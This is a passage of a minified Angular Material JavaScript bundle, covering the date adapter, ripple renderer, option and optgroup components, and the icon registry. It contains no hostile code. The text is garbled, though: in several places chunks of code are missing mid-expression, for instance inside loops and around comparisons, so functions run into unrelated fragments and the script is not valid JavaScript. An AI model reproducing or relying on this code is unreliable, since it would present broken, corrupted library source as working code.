Dpe(t,a){if(1&t&&(m(0,"span",5),s(1),u()),2&t){const e=V();g(1),ct("(",e.group.label,")")}}const xpe=["*"];let wpe=(()=>{class t{}return t.STANDARD_CURVE="cubic-bezier(0.4,0.0,0.2,1)",t.DECELERATION_CURVE="cubic-bezier(0.0,0.0,0.2,1)",t.ACCELERATION_CURVE="cubic-bezier(0.4,0.0,1,1)",t.SHARP_CURVE="cubic-bezier(0.4,0.0,0.6,1)",t})(),Ipe=(()=>{class t{}return t.COMPLEX="375ms",t.ENTERING="225ms",t.EXITING="195ms",t})();const Spe=new ni("mat-sanity-checks",{providedIn:"root",factory:function Rpe(){return!0}});let la=(()=>{class t{constructor(e,i,n){this._sanityChecks=i,this._document=n,this._hasDoneGlobalChecks=!1,e._applyBodyHighContrastModeCssClasses(),this._hasDoneGlobalChecks||(this._hasDoneGlobalChecks=!0)}_checkIsEnabled(e){return!rw()&&("boolean"==typeof this._sanityChecks?this._sanityChecks:!!this._sanityChecks[e])}}return t.\u0275fac=function(e){return new(e||t)(At(Qz),At(Spe,8),At(ga))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1,R1]}),t})();function Zc(t){return class extends t{constructor(...a){super(...a),this._disabled=!1}get disabled(){return this._disabled}set disabled(a){this._disabled=wi(a)}}}function Pd(t,a){return class extends t{constructor(...e){super(...e),this.defaultColor=a,this.color=a}get color(){return this._color}set color(e){const i=e||this.defaultColor;i!==this._color&&(this._color&&this._elementRef.nativeElement.classList.remove(`mat-${this._color}`),i&&this._elementRef.nativeElement.classList.add(`mat-${i}`),this._color=i)}}}function El(t){return class extends t{constructor(...a){super(...a),this._disableRipple=!1}get disableRipple(){return this._disableRipple}set disableRipple(a){this._disableRipple=wi(a)}}}function dp(t,a=0){return class extends t{constructor(...e){super(...e),this._tabIndex=a,this.defaultTabIndex=a}get tabIndex(){return this.disabled?-1:this._tabIndex}set tabIndex(e){this._tabIndex=null!=e?Uo(e):this.defaultTabIndex}}}function Uw(t){return class extends t{constructor(...a){super(...a),this.errorState=!1}updateErrorState(){const a=this.errorState,r=(this.errorStateMatcher||this._defaultErrorStateMatcher).isErrorState(this.ngControl?this.ngControl.control:null,this._parentFormGroup||this._parentForm);r!==a&&(this.errorState=r,this.stateChanges.next())}}}function yW(t){return class extends t{constructor(...a){super(...a),this._isInitialized=!1,this._pendingSubscribers=[],this.initialized=new G(e=>{this._isInitialized?this._notifySubscriber(e):this._pendingSubscribers.push(e)})}_markInitialized(){this._isInitialized=!0,this._pendingSubscribers.forEach(this._notifySubscriber),this._pendingSubscribers=null}_notifySubscriber(a){a.next(),a.complete()}}}const kpe=new ni("MAT_DATE_LOCALE",{providedIn:"root",factory:function Ppe(){return Po(dm)}});class pu{constructor(){this._localeChanges=new J,this.localeChanges=this._localeChanges}getValidDateOrNull(a){return this.isDateInstance(a)&&this.isValid(a)?a:null}deserialize(a){return null==a||this.isDateInstance(a)&&this.isValid(a)?a:this.invalid()}setLocale(a){this.locale=a,this._localeChanges.next()}compareDate(a,e){return this.getYear(a)-this.getYear(e)||this.getMonth(a)-this.getMonth(e)||this.getDate(a)-this.getDate(e)}sameDate(a,e){if(a&&e){let i=this.isValid(a),n=this.isValid(e);return i&&n?!this.compareDate(a,e):i==n}return a==e}clampDate(a,e,i){return e&&this.compareDate(a,e)<0?e:i&&this.compareDate(a,i)>0?i:a}}const qw=new ni("mat-date-formats"),Ope=/^\d{4}-\d{2}-\d{2}(?:T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|(?:(?:\+|-)\d{2}:\d{2}))?)?$/;function Gw(t,a){const e=Array(t);for(let i=0;i{class t extends pu{constructor(e,i){super(),this.useUtcForDisplay=!1,super.setLocale(e)}getYear(e){return e.getFullYear()}getMonth(e){return e.getMonth()}getDate(e){return e.getDate()}getDayOfWeek(e){return e.getDay()}getMonthNames(e){const i=new Intl.DateTimeFormat(this.locale,{month:e,timeZone:"utc"});return Gw(12,n=>this._format(i,new Date(2017,n,1)))}getDateNames(){const e=new Intl.DateTimeFormat(this.locale,{day:"numeric",timeZone:"utc"});return Gw(31,i=>this._format(e,new Date(2017,0,i+1)))}getDayOfWeekNames(e){const i=new Intl.DateTimeFormat(this.locale,{weekday:e,timeZone:"utc"});return Gw(7,n=>this._format(i,new Date(2017,0,n+1)))}getYearName(e){const i=new Intl.DateTimeFormat(this.locale,{year:"numeric",timeZone:"utc"});return this._format(i,e)}getFirstDayOfWeek(){return 0}getNumDaysInMonth(e){return this.getDate(this._createDateWithOverflow(this.getYear(e),this.getMonth(e)+1,0))}clone(e){return new Date(e.getTime())}createDate(e,i,n){let r=this._createDateWithOverflow(e,i,n);return r.getMonth(),r}today(){return new Date}parse(e,i){return"number"==typeof e?new Date(e):e?new Date(Date.parse(e)):null}format(e,i){if(!this.isValid(e))throw Error("NativeDateAdapter: Cannot format invalid date.");const n=new Intl.DateTimeFormat(this.locale,Object.assign(Object.assign({},i),{timeZone:"utc"}));return this._format(n,e)}addCalendarYears(e,i){return this.addCalendarMonths(e,12*i)}addCalendarMonths(e,i){let n=this._createDateWithOverflow(this.getYear(e),this.getMonth(e)+i,this.getDate(e));return this.getMonth(n)!=((this.getMonth(e)+i)%12+12)%12&&(n=this._createDateWithOverflow(this.getYear(n),this.getMonth(n),0)),n}addCalendarDays(e,i){return this._createDateWithOverflow(this.getYear(e),this.getMonth(e),this.getDate(e)+i)}toIso8601(e){return[e.getUTCFullYear(),this._2digit(e.getUTCMonth()+1),this._2digit(e.getUTCDate())].join("-")}deserialize(e){if("string"==typeof e){if(!e)return null;if(Ope.test(e)){let i=new Date(e);if(this.isValid(i))return i}}return super.deserialize(e)}isDateInstance(e){return e instanceof Date}isValid(e){return!isNaN(e.getTime())}invalid(){return new Date(NaN)}_createDateWithOverflow(e,i,n){const r=new Date;return r.setFullYear(e,i,n),r.setHours(0,0,0,0),r}_2digit(e){return("00"+e).slice(-2)}_format(e,i){const n=new Date;return n.setUTCFullYear(i.getFullYear(),i.getMonth(),i.getDate()),n.setUTCHours(i.getHours(),i.getMinutes(),i.getSeconds(),i.getMilliseconds()),e.format(n)}}return t.\u0275fac=function(e){return new(e||t)(At(kpe,8),At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const Lpe={parse:{dateInput:null},display:{dateInput:{year:"numeric",month:"numeric",day:"numeric"},monthYearLabel:{year:"numeric",month:"short"},dateA11yLabel:{year:"numeric",month:"long",day:"numeric"},monthYearA11yLabel:{year:"numeric",month:"long"}}};let zpe=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:pu,useClass:Npe}]}),t})(),bW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:qw,useValue:Lpe}],imports:[zpe]}),t})(),mp=(()=>{class t{isErrorState(e,i){return!!(e&&e.invalid&&(e.touched||i&&i.submitted))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Or=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-line",""],["","matLine",""]],hostAttrs:[1,"mat-line"]}),t})();function eb(t,a,e){t.nativeElement.classList.toggle(a,e)}let vW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();class Wpe{constructor(a,e,i,n=!1){this._renderer=a,this.element=e,this.config=i,this._animationForciblyDisabledThroughCss=n,this.state=3}fadeOut(){this._renderer.fadeOutRipple(this)}}const AW={enterDuration:225,exitDuration:150},jw=ym({passive:!0}),TW=["mousedown","touchstart"],EW=["mouseup","mouseleave","touchend","touchcancel"];class DW{constructor(a,e,i,n){this._target=a,this._ngZone=e,this._isPointerDown=!1,this._activeRipples=new Map,this._pointerUpEventsRegistered=!1,n.isBrowser&&(this._containerElement=Gr(i))}fadeInRipple(a,e,i={}){const n=this._containerRect=this._containerRect||this._containerElement.getBoundingClientRect(),r=Object.assign(Object.assign({},AW),i.animation);i.centered&&(a=n.left+n.width/2,e=n.top+n.height/2);const c=i.radius||function Vpe(t,a,e){const i=Math.max(Math.abs(t-e.left),Math.abs(t-e.right)),n=Math.max(Math.abs(a-e.top),Math.abs(a-e.bottom));return Math.sqrt(i*i+n*n)}(a,e,n),d=a-n.left,T=e-n.top,k=r.enterDuration,q=document.createElement("div");q.classList.add("mat-ripple-element"),q.style.left=d-c+"px",q.style.top=T-c+"px",q.style.height=2*c+"px",q.style.width=2*c+"px",null!=i.color&&(q.style.backgroundColor=i.color),q.style.transitionDuration=`${k}ms`,this._containerElement.appendChild(q);const Y=window.getComputedStyle(q),pe=Y.transitionDuration,Re="none"===Y.transitionProperty||"0s"===pe||"0s, 0s"===pe,Fe=new Wpe(this,q,i,Re);q.style.transform="scale3d(1, 1, 1)",Fe.state=0,i.persistent||(this._mostRecentTransientRipple=Fe);let Ne=null;return!Re&&(k||r.exitDuration)&&this._ngZone.runOutsideAngular(()=>{const et=()=>this._finishRippleTransition(Fe),ut=()=>this._destroyRipple(Fe);q.addEventListener("transitionend",et),q.addEventListener("transitioncancel",ut),Ne={onTransitionEnd:et,onTransitionCancel:ut}}),this._activeRipples.set(Fe,Ne),(Re||!k)&&this._finishRippleTransition(Fe),Fe}fadeOutRipple(a){if(2===a.state||3===a.state)return;const e=a.element,i=Object.assign(Object.assign({},AW),a.config.animation);e.style.transitionDuration=`${i.exitDuration}ms`,e.style.opacity="0",a.state=2,(a._animationForciblyDisabledThroughCss||!i.exitDuration)&&this._finishRippleTransition(a)}fadeOutAll(){this._getActiveRipples().forEach(a=>a.fadeOut())}fadeOutAllNonPersistent(){this._getActiveRipples().forEach(a=>{a.config.persistent||a.fadeOut()})}setupTriggerEvents(a){const e=Gr(a);!e||e===this._triggerElement||(this._removeTriggerEvents(),this._triggerElement=e,this._registerEvents(TW))}handleEvent(a){"mousedown"===a.type?this._onMousedown(a):"touchstart"===a.type?this._onTouchStart(a):this._onPointerUp(),this._pointerUpEventsRegistered||(this._registerEvents(EW),this._pointerUpEventsRegistered=!0)}_finishRippleTransition(a){0===a.state?this._startFadeOutTransition(a):2===a.state&&this._destroyRipple(a)}_startFadeOutTransition(a){const e=a===this._mostRecentTransientRipple,{persistent:i}=a.config;a.state=1,!i&&(!e||!this._isPointerDown)&&a.fadeOut()}_destroyRipple(a){var e;const i=null!==(e=this._activeRipples.get(a))&&void 0!==e?e:null;this._activeRipples.delete(a),this._activeRipples.size||(this._containerRect=null),a===this._mostRecentTransientRipple&&(this._mostRecentTransientRipple=null),a.state=3,null!==i&&(a.element.removeEventListener("transitionend",i.onTransitionEnd),a.element.removeEventListener("transitioncancel",i.onTransitionCancel)),a.element.remove()}_onMousedown(a){const e=W3(a),i=this._lastTouchStartEvent&&Date.now(){!a.config.persistent&&(1===a.state||a.config.terminateOnPointerUp&&0===a.state)&&a.fadeOut()}))}_registerEvents(a){this._ngZone.runOutsideAngular(()=>{a.forEach(e=>{this._triggerElement.addEventListener(e,this,jw)})})}_getActiveRipples(){return Array.from(this._activeRipples.keys())}_removeTriggerEvents(){this._triggerElement&&(TW.forEach(a=>{this._triggerElement.removeEventListener(a,this,jw)}),this._pointerUpEventsRegistered&&EW.forEach(a=>{this._triggerElement.removeEventListener(a,this,jw)}))}}const xW=new ni("mat-ripple-global-options");let Dl=(()=>{class t{constructor(e,i,n,r,c){this._elementRef=e,this._animationMode=c,this.radius=0,this._disabled=!1,this._isInitialized=!1,this._globalOptions=r||{},this._rippleRenderer=new DW(this,i,e,n)}get disabled(){return this._disabled}set disabled(e){e&&this.fadeOutAllNonPersistent(),this._disabled=e,this._setupTriggerEventsIfEnabled()}get trigger(){return this._trigger||this._elementRef.nativeElement}set trigger(e){this._trigger=e,this._setupTriggerEventsIfEnabled()}ngOnInit(){this._isInitialized=!0,this._setupTriggerEventsIfEnabled()}ngOnDestroy(){this._rippleRenderer._removeTriggerEvents()}fadeOutAll(){this._rippleRenderer.fadeOutAll()}fadeOutAllNonPersistent(){this._rippleRenderer.fadeOutAllNonPersistent()}get rippleConfig(){return{centered:this.centered,radius:this.radius,color:this.color,animation:Object.assign(Object.assign(Object.assign({},this._globalOptions.animation),"NoopAnimations"===this._animationMode?{enterDuration:0,exitDuration:0}:{}),this.animation),terminateOnPointerUp:this._globalOptions.terminateOnPointerUp}}get rippleDisabled(){return this.disabled||!!this._globalOptions.disabled}_setupTriggerEventsIfEnabled(){!this.disabled&&this._isInitialized&&this._rippleRenderer.setupTriggerEvents(this.trigger)}launch(e,i=0,n){return"number"==typeof e?this._rippleRenderer.fadeInRipple(e,i,Object.assign(Object.assign({},this.rippleConfig),n)):this._rippleRenderer.fadeInRipple(0,0,Object.assign(Object.assign({},this.rippleConfig),e))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(cr),Ee(xW,8),Ee(ar,8))},t.\u0275dir=Ot({type:t,selectors:[["","mat-ripple",""],["","matRipple",""]],hostAttrs:[1,"mat-ripple"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-ripple-unbounded",i.unbounded)},inputs:{color:["matRippleColor","color"],unbounded:["matRippleUnbounded","unbounded"],centered:["matRippleCentered","centered"],radius:["matRippleRadius","radius"],animation:["matRippleAnimation","animation"],disabled:["matRippleDisabled","disabled"],trigger:["matRippleTrigger","trigger"]},exportAs:["matRipple"]}),t})(),Od=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),wW=(()=>{class t{constructor(e){this._animationMode=e,this.state="unchecked",this.disabled=!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-pseudo-checkbox"]],hostAttrs:[1,"mat-pseudo-checkbox"],hostVars:8,hostBindings:function(e,i){2&e&&Ct("mat-pseudo-checkbox-indeterminate","indeterminate"===i.state)("mat-pseudo-checkbox-checked","checked"===i.state)("mat-pseudo-checkbox-disabled",i.disabled)("_mat-animation-noopable","NoopAnimations"===i._animationMode)},inputs:{state:"state",disabled:"disabled"},decls:0,vars:0,template:function(e,i){},styles:['.mat-pseudo-checkbox{width:16px;height:16px;border:2px solid;border-radius:2px;cursor:pointer;display:inline-block;vertical-align:middle;box-sizing:border-box;position:relative;flex-shrink:0;transition:border-color 90ms cubic-bezier(0, 0, 0.2, 0.1),background-color 90ms cubic-bezier(0, 0, 0.2, 0.1)}.mat-pseudo-checkbox::after{position:absolute;opacity:0;content:"";border-bottom:2px solid currentColor;transition:opacity 90ms cubic-bezier(0, 0, 0.2, 0.1)}.mat-pseudo-checkbox.mat-pseudo-checkbox-checked,.mat-pseudo-checkbox.mat-pseudo-checkbox-indeterminate{border-color:rgba(0,0,0,0)}.mat-pseudo-checkbox._mat-animation-noopable{transition:none !important;animation:none !important}.mat-pseudo-checkbox._mat-animation-noopable::after{transition:none}.mat-pseudo-checkbox-disabled{cursor:default}.mat-pseudo-checkbox-indeterminate::after{top:5px;left:1px;width:10px;opacity:1;border-radius:2px}.mat-pseudo-checkbox-checked::after{top:2.4px;left:1px;width:8px;height:3px;border-left:2px solid currentColor;transform:rotate(-45deg);opacity:1;box-sizing:content-box}'],encapsulation:2,changeDetection:0}),t})(),Qw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la]}),t})();const G3=new ni("MAT_OPTION_PARENT_COMPONENT"),Bpe=Zc(class{});let Hpe=0,Upe=(()=>{class t extends Bpe{constructor(e){var i;super(),this._labelId="mat-optgroup-label-"+Hpe++,this._inert=null!==(i=null==e?void 0:e.inertGroups)&&void 0!==i&&i}}return t.\u0275fac=function(e){return new(e||t)(Ee(G3,8))},t.\u0275dir=Ot({type:t,inputs:{label:"label"},features:[ci]}),t})();const j3=new ni("MatOptgroup");let gg=(()=>{class t extends Upe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-optgroup"]],hostAttrs:[1,"mat-optgroup"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("role",i._inert?null:"group")("aria-disabled",i._inert?null:i.disabled.toString())("aria-labelledby",i._inert?null:i._labelId),Ct("mat-optgroup-disabled",i.disabled))},inputs:{disabled:"disabled"},exportAs:["matOptgroup"],features:[ki([{provide:j3,useExisting:t}]),ci],ngContentSelectors:Tpe,decls:4,vars:2,consts:[["aria-hidden","true",1,"mat-optgroup-label",3,"id"]],template:function(e,i){1&e&&(Jn(Ape),m(0,"span",0),s(1),va(2),u(),va(3,1)),2&e&&(F("id",i._labelId),g(1),ct("",i.label," "))},styles:[".mat-optgroup-label{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;-webkit-user-select:none;user-select:none;cursor:default}.mat-optgroup-label[disabled]{cursor:default}[dir=rtl] .mat-optgroup-label{text-align:right}.mat-optgroup-label .mat-icon{margin-right:16px;vertical-align:middle}.mat-optgroup-label .mat-icon svg{vertical-align:top}[dir=rtl] .mat-optgroup-label .mat-icon{margin-left:16px;margin-right:0}"],encapsulation:2,changeDetection:0}),t})(),qpe=0;class IW{constructor(a,e=!1){this.source=a,this.isUserInput=e}}let Gpe=(()=>{class t{constructor(e,i,n,r){this._element=e,this._changeDetectorRef=i,this._parent=n,this.group=r,this._selected=!1,this._active=!1,this._disabled=!1,this._mostRecentViewValue="",this.id="mat-option-"+qpe++,this.onSelectionChange=new Tt,this._stateChanges=new J}get multiple(){return this._parent&&this._parent.multiple}get selected(){return this._selected}get disabled(){return this.group&&this.group.disabled||this._disabled}set disabled(e){this._disabled=wi(e)}get disableRipple(){return!(!this._parent||!this._parent.disableRipple)}get active(){return this._active}get viewValue(){return(this._getHostElement().textContent||"").trim()}select(){this._selected||(this._selected=!0,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent())}deselect(){this._selected&&(this._selected=!1,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent())}focus(e,i){const n=this._getHostElement();"function"==typeof n.focus&&n.focus(i)}setActiveStyles(){this._active||(this._active=!0,this._changeDetectorRef.markForCheck())}setInactiveStyles(){this._active&&(this._active=!1,this._changeDetectorRef.markForCheck())}getLabel(){return this.viewValue}_handleKeydown(e){(13===e.keyCode||32===e.keyCode)&&!es(e)&&(this._selectViaInteraction(),e.preventDefault())}_selectViaInteraction(){this.disabled||(this._selected=!this.multiple||!this._selected,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent(!0))}_getAriaSelected(){return this.selected||!this.multiple&&null}_getTabIndex(){return this.disabled?"-1":"0"}_getHostElement(){return this._element.nativeElement}ngAfterViewChecked(){if(this._selected){const e=this.viewValue;e!==this._mostRecentViewValue&&(this._mostRecentViewValue=e,this._stateChanges.next())}}ngOnDestroy(){this._stateChanges.complete()}_emitSelectionChangeEvent(e=!1){this.onSelectionChange.emit(new IW(this,e))}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{value:"value",id:"id",disabled:"disabled"},outputs:{onSelectionChange:"onSelectionChange"}}),t})(),yr=(()=>{class t extends Gpe{constructor(e,i,n,r){super(e,i,n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(G3,8),Ee(j3,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-option"]],hostAttrs:["role","option",1,"mat-option","mat-focus-indicator"],hostVars:12,hostBindings:function(e,i){1&e&&he("click",function(){return i._selectViaInteraction()})("keydown",function(r){return i._handleKeydown(r)}),2&e&&(Gs("id",i.id),Rt("tabindex",i._getTabIndex())("aria-selected",i._getAriaSelected())("aria-disabled",i.disabled.toString()),Ct("mat-selected",i.selected)("mat-option-multiple",i.multiple)("mat-active",i.active)("mat-option-disabled",i.disabled))},exportAs:["matOption"],features:[ci],ngContentSelectors:xpe,decls:5,vars:4,consts:[["class","mat-option-pseudo-checkbox",3,"state","disabled",4,"ngIf"],[1,"mat-option-text"],["class","cdk-visually-hidden",4,"ngIf"],["mat-ripple","",1,"mat-option-ripple",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-option-pseudo-checkbox",3,"state","disabled"],[1,"cdk-visually-hidden"]],template:function(e,i){1&e&&(Jn(),ne(0,Epe,1,2,"mat-pseudo-checkbox",0),m(1,"span",1),va(2),u(),ne(3,Dpe,2,1,"span",2),it(4,"div",3)),2&e&&(F("ngIf",i.multiple),g(3),F("ngIf",i.group&&i.group._inert),g(1),F("matRippleTrigger",i._getHostElement())("matRippleDisabled",i.disabled||i.disableRipple))},dependencies:[Dl,Ri,wW],styles:['.mat-option{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;position:relative;cursor:pointer;outline:none;display:flex;flex-direction:row;max-width:100%;box-sizing:border-box;align-items:center;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-option[disabled]{cursor:default}[dir=rtl] .mat-option{text-align:right}.mat-option .mat-icon{margin-right:16px;vertical-align:middle}.mat-option .mat-icon svg{vertical-align:top}[dir=rtl] .mat-option .mat-icon{margin-left:16px;margin-right:0}.mat-option[aria-disabled=true]{-webkit-user-select:none;user-select:none;cursor:default}.mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:32px}[dir=rtl] .mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:16px;padding-right:32px}.mat-option.mat-active::before{content:""}.cdk-high-contrast-active .mat-option[aria-disabled=true]{opacity:.5}.cdk-high-contrast-active .mat-option.mat-selected:not(.mat-option-multiple)::after{content:"";position:absolute;top:50%;right:16px;transform:translateY(-50%);width:10px;height:0;border-bottom:solid 10px;border-radius:10px}[dir=rtl] .cdk-high-contrast-active .mat-option.mat-selected:not(.mat-option-multiple)::after{right:auto;left:16px}.mat-option-text{display:inline-block;flex-grow:1;overflow:hidden;text-overflow:ellipsis}.mat-option .mat-option-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-option-pseudo-checkbox{margin-right:8px}[dir=rtl] .mat-option-pseudo-checkbox{margin-left:8px;margin-right:0}'],encapsulation:2,changeDetection:0}),t})();function $w(t,a,e){if(e.length){let i=a.toArray(),n=e.toArray(),r=0;for(let c=0;ce+i?Math.max(0,t-i+a):e}let Q3=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Od,rn,la,Qw]}),t})();const jpe=["*"];let $3;function tb(t){var a;return(null===(a=function Qpe(){if(void 0===$3&&($3=null,"undefined"!=typeof window)){const t=window;void 0!==t.trustedTypes&&($3=t.trustedTypes.createPolicy("angular#components",{createHTML:a=>a}))}return $3}())||void 0===a?void 0:a.createHTML(t))||t}function SW(t){return Error(`Unable to find icon with the name "${t}"`)}function kW(t){return Error(`The URL provided to MatIconRegistry was not trusted as a resource URL via Angular's DomSanitizer. Attempted URL was "${t}".`)}function PW(t){return Error(`The literal provided to MatIconRegistry was not trusted as safe HTML by Angular's DomSanitizer. Attempted literal was "${t}".`)}class Cg{constructor(a,e,i){this.url=a,this.svgText=e,this.options=i}}let K3=(()=>{class t{constructor(e,i,n,r){this._httpClient=e,this._sanitizer=i,this._errorHandler=r,this._svgIconConfigs=new Map,this._iconSetConfigs=new Map,this._cachedIconsByUrl=new Map,this._inProgressUrlFetches=new Map,this._fontCssClassesByAlias=new Map,this._resolvers=[],this._defaultFontSetClass=["material-icons","mat-ligature-font"],this._document=n}addSvgIcon(e,i,n){return this.addSvgIconInNamespace("",e,i,n)}addSvgIconLiteral(e,i,n){return this.addSvgIconLiteralInNamespace("",e,i,n)}addSvgIconInNamespace(e,i,n,r){return this._addSvgIconConfig(e,i,new Cg(n,null,r))}addSvgIconResolver(e){return this._resolvers.push(e),this}addSvgIconLiteralInNamespace(e,i,n,r){const c=this._sanitizer.sanitize(oo.HTML,n);if(!c)throw PW(n);const d=tb(c);return this._addSvgIconConfig(e,i,new Cg("",d,r))}addSvgIconSet(e,i){return this.addSvgIconSetInNamespace("",e,i)}addSvgIconSetLiteral(e,i){return this.addSvgIconSetLiteralInNamespace("",e,i)}addSvgIconSetInNamespace(e,i,n){return this._addSvgIconSetConfig(e,new Cg(i,null,n))}addSvgIconSetLiteralInNamespace(e,i,n){const r=this._sanitizer.sanitize(oo.HTML,i);if(!r)throw PW(i);const c=tb(r);return this._addSvgIconSetConfig(e,new Cg("",c,n))}registerFontClassAlias(e,i=e){return this._fontCssClassesByAlias.set(e,i),this}classNameForFontAlias(e){return this._fontCssClassesByAlias.get(e)||e}setDefaultFontSetClass(...e){return this._defaultFontSetClass=e,this}getDefaultFontSetClass(){return this._defaultFontSetClass}getSvgIconFromUrl(e){const i=this._sanitizer.sanitize(oo.RESOURCE_URL,e);if(!i)throw kW(e);const n=this._cachedIconsByUrl.get(i);return n?Bi(X3(n)):this._loadSvgIconFromConfig(new Cg(e,null)).pipe(qr(r=>this._cachedIconsByUrl.set(i,r)),Xe(r=>X3(r)))}getNamedSvgIcon(e,i=""){const n=OW(i,e);let r=this._svgIconConfigs.get(n);if(r)return this._getSvgFromConfig(r);if(r=this._getIconConfigFromResolvers(i,e),r)return this._svgIconConfigs.set(n,r),this._getSvgFromConfig(r);const c=this._iconSetConfigs.get(i);return c?this._getSvgFromIconSetConfigs(e,c):b1(SW(n))}ngOnDestroy(){this._resolvers=[],this._svgIconConfigs.clear(),this._iconSetConfigs.clear(),this._cachedIconsByUrl.clear()}_getSvgFromConfig(e){return e.svgText?Bi(X3(this._svgElementFromConfig(e))):this._loadSvgIconFromConfig(e).pipe(Xe(i=>X3(i)))}_getSvgFromIconSetConfigs(e,i){const n=this._extractIconWithNameFromAnySet(e,i);return n?Bi(n):$6(i.filter(c=>!c.svgText).map(c=>this._loadSvgIconSetFromConfig(c).pipe(Sh(d=>{const k=`Loading icon set URL: ${this._sanitizer.sanitize(oo.RESOURCE_URL,c.url)} failed: ${d.message}`;return this._errorHandler.handleError(new Error(k)),Bi(null)})))).pipe(Xe(()=>{const c=this._extractIconWithNameFromAnySet(e,i);if(!c)throw SW(e);return c}))}_extractIconWithNameFromAnySet(e,i){for(let n=i.length-1;n>=0;n--){const r=i[n];if(r.svgText&&r.svgText.toString().indexOf(e)>-1){const c=this._svgElementFromConfig(r),d=this._extractSvgIconFromSet(c,e,r.options);if(d)return d}}return null}_loadSvgIconFromConfig(e){return this._fetchIcon(e).pipe(qr(i=>e.svgText=i),Xe(()=>this._svgElementFromConfig(e)))}_loadSvgIconSetFromConfig(e){return e.svgText?Bi(null):this._fetchIcon(e).pipe(qr(i=>e.svgText=i))}_extractSvgIconFromSet(e,i,n){const r=e.querySelector(`[id="${i}"]`);if(!r)return null;const c=r.cloneNode(!0);if(c.removeAttribute("id"),"svg"===c.nodeName.toLowerCase())return this._setSvgAttributes(c,n);if("symbol"===c.nodeName.toLowerCase())return this._setSvgAttributes(this._toSvgElement(c),n);const d=this._svgElementFromString(tb(""));return d.appendChild(c),this._setSvgAttributes(d,n)}_svgElementFromString(e){const i=this._document.createElement("DIV");i.innerHTML=e;const n=i.querySelector("svg");if(!n)throw Error(" tag not found");return n}_toSvgElement(e){const i=this._svgElementFromString(tb("")),n=e.attributes;for(let r=0;rtb(q)),U4(()=>this._inProgressUrlFetches.delete(d)),Bd());return this._inProgressUrlFetches.set(d,k),k}_addSvgIconConfig(e,i,n){return this._svgIconConfigs.set(OW(e,i),n),this}_addSvgIconSetConfig(e,i){const n=this._iconSetConfigs.get(e);return n?n.push(i):this._iconSetConfigs.set(e,[i]),this}_svgElementFromConfig(e){if(!e.svgElement){const i=this._svgElementFromString(e.svgText);this._setSvgAttributes(i,e.options),e.svgElement=i}return e.svgElement}_getIconConfigFromResolvers(e,i){for(let n=0;na?a.pathname+a.search:""}}}),NW=["clip-path","color-profile","src","cursor","fill","filter","marker","marker-start","marker-mid","marker-end","mask","stroke"],t_e=NW.map(t=>`[${t}]`).join(", "),i_e=/^url\(['"]?#(.*?)['"]?\)$/;let oa=(()=>{class t extends Ype{constructor(e,i,n,r,c,d){super(e),this._iconRegistry=i,this._location=r,this._errorHandler=c,this._inline=!1,this._previousFontSetClass=[],this._currentIconFetch=I.EMPTY,d&&(d.color&&(this.color=this.defaultColor=d.color),d.fontSet&&(this.fontSet=d.fontSet)),n||e.nativeElement.setAttribute("aria-hidden","true")}get inline(){return this._inline}set inline(e){this._inline=wi(e)}get svgIcon(){return this._svgIcon}set svgIcon(e){e!==this._svgIcon&&(e?this._updateSvgIcon(e):this._svgIcon&&this._clearSvgElement(),this._svgIcon=e)}get fontSet(){return this._fontSet}set fontSet(e){const i=this._cleanupFontValue(e);i!==this._fontSet&&(this._fontSet=i,this._updateFontIconClasses())}get fontIcon(){return this._fontIcon}set fontIcon(e){const i=this._cleanupFontValue(e);i!==this._fontIcon&&(this._fontIcon=i,this._updateFontIconClasses())}_splitIconName(e){if(!e)return["",""];const i=e.split(":");switch(i.length){case 1:return["",i[0]];case 2:return i;default:throw Error(`Invalid icon name: "${e}"`)}}ngOnInit(){this._updateFontIconClasses()}ngAfterViewChecked(){const e=this._elementsWithExternalReferences;if(e&&e.size){const 